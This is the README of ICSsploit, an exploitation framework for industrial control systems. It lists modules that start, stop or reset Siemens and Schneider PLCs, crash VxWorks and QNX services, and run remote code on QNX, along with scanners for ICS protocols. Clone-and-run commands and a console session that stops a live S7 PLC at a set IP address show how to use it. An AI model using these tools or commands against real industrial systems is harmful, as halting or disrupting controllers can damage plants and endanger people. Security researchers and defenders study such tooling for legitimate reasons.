ICSsploit (Industrial Control System Exploitation)
ICSsploit is a exploitation framework based on Python, it's similar to metasploit framework.
Name |
Path |
Description |
modbus_tcp_client |
icssploit/clients/modbus_tcp_client.py |
Modbus-TCP Client |
wdb2_client |
icssploit/clients/wdb2_client.py |
WdbRPC Version 2 Client(Vxworks 6.x) |
s7_client |
icssploit/clients/s7_client.py |
s7comm Client(S7 300/400 PLC) |
Name |
Path |
Description |
s7_300_400_plc_control |
exploits/plcs/siemens/s7_300_400_plc_control.py |
S7-300/400 PLC start/stop |
s7_1200_plc_control |
exploits/plcs/siemens/s7_1200_plc_control.py |
S7-1200 PLC start/stop/reset |
vxworks_rpc_dos |
exploits/plcs/vxworks/vxworks_rpc_dos.py |
Vxworks RPC remote dos(CVE-2015-7599) |
quantum_140_plc_control |
exploits/plcs/schneider/quantum_140_plc_control.py |
Schneider Quantum 140 series PLC start/stop |
crash_qnx_inetd_tcp_service |
exploits/plcs/qnx/crash_qnx_inetd_tcp_service.py |
QNX Inetd TCP service dos |
qconn_remote_exec |
exploits/plcs/qnx/qconn_remote_exec.py |
QNX qconn remote code execution |
profinet_set_ip |
exploits/plcs/siemens/profinet_set_ip.py |
Profinet DCP device IP config |
Name |
Path |
Description |
profinet_dcp_scan |
scanners/profinet_dcp_scan.py |
Profinet DCP scanner |
vxworks_6_scan |
scanners/vxworks_6_scan.py |
Vxworks 6.x scanner |
s7comm_scan |
scanners/s7comm_scan.py |
S7comm scanner |
enip_scan |
scanners/enip_scan.py |
EthernetIP scanner |
ICS Protocols Module (Scapy Module)
These protocol can used in other Fuzzing framework like Kitty or create your own client.
Name |
Path |
Description |
pn_dcp |
icssploit/protocols/pn_dcp |
Profinet DCP Protocol |
modbus_tcp |
icssploit/protocols/modbus_tcp |
Modbus TCP Protocol |
wdbrpc2 |
icssploit/protocols/wdbrpc2 |
WDB RPC Version 2 Protocol |
s7comm |
icssploit/protocols/s7comm.py |
S7comm Protocol |
git clone https://github.com/dark-lbp/isf/
cd isf
python isf.py
root@kali:~/Desktop/temp/isf# python isf.py
_____ _____ _____ _____ _____ _ ____ _____ _______
|_ _/ ____|/ ____/ ____| __ \| | / __ \_ _|__ __|
| || | | (___| (___ | |__) | | | | | || | | |
| || | \___ \\___ \| ___/| | | | | || | | |
_| || |____ ____) |___) | | | |___| |__| || |_ | |
|_____\_____|_____/_____/|_| |______\____/_____| |_|
ICS Exploitation Framework
Note : ICSSPOLIT is fork from routersploit at
https://github.com/reverse-shell/routersploit
Dev Team : wenzhe zhu(dark-lbp)
Version : 0.1.0
Exploits: 2 Scanners: 0 Creds: 13
ICS Exploits:
PLC: 2 ICS Switch: 0
Software: 0
isf >
isf > use exploits/plcs/
exploits/plcs/siemens/ exploits/plcs/vxworks/
isf > use exploits/plcs/siemens/s7_300_400_plc_control
exploits/plcs/siemens/s7_300_400_plc_control
isf > use exploits/plcs/siemens/s7_300_400_plc_control
isf (S7-300/400 PLC Control) >
You can use the tab key for completion.
isf (S7-300/400 PLC Control) > show options
Target options:
Name Current settings Description
---- ---------------- -----------
target Target address e.g. 192.168.1.1
port 102 Target Port
Module options:
Name Current settings Description
---- ---------------- -----------
slot 2 CPU slot number.
command 1 Command 0:start plc, 1:stop plc.
isf (S7-300/400 PLC Control) >
isf (S7-300/400 PLC Control) > set target 192.168.70.210
[+] {'target': '192.168.70.210'}
isf (S7-300/400 PLC Control) > run
[*] Running module...
[+] Target is alive
[*] Sending packet to target
[*] Stop plc
isf (S7-300/400 PLC Control) >
Display information about exploit
isf (S7-300/400 PLC Control) > show info
Name:
S7-300/400 PLC Control
Description:
Use S7comm command to start/stop plc.
Devices:
- Siemens S7-300 and S7-400 programmable logic controllers (PLCs)
Authors:
- wenzhe zhu <jtrkid[at]gmail.com>
References:
isf (S7-300/400 PLC Control) >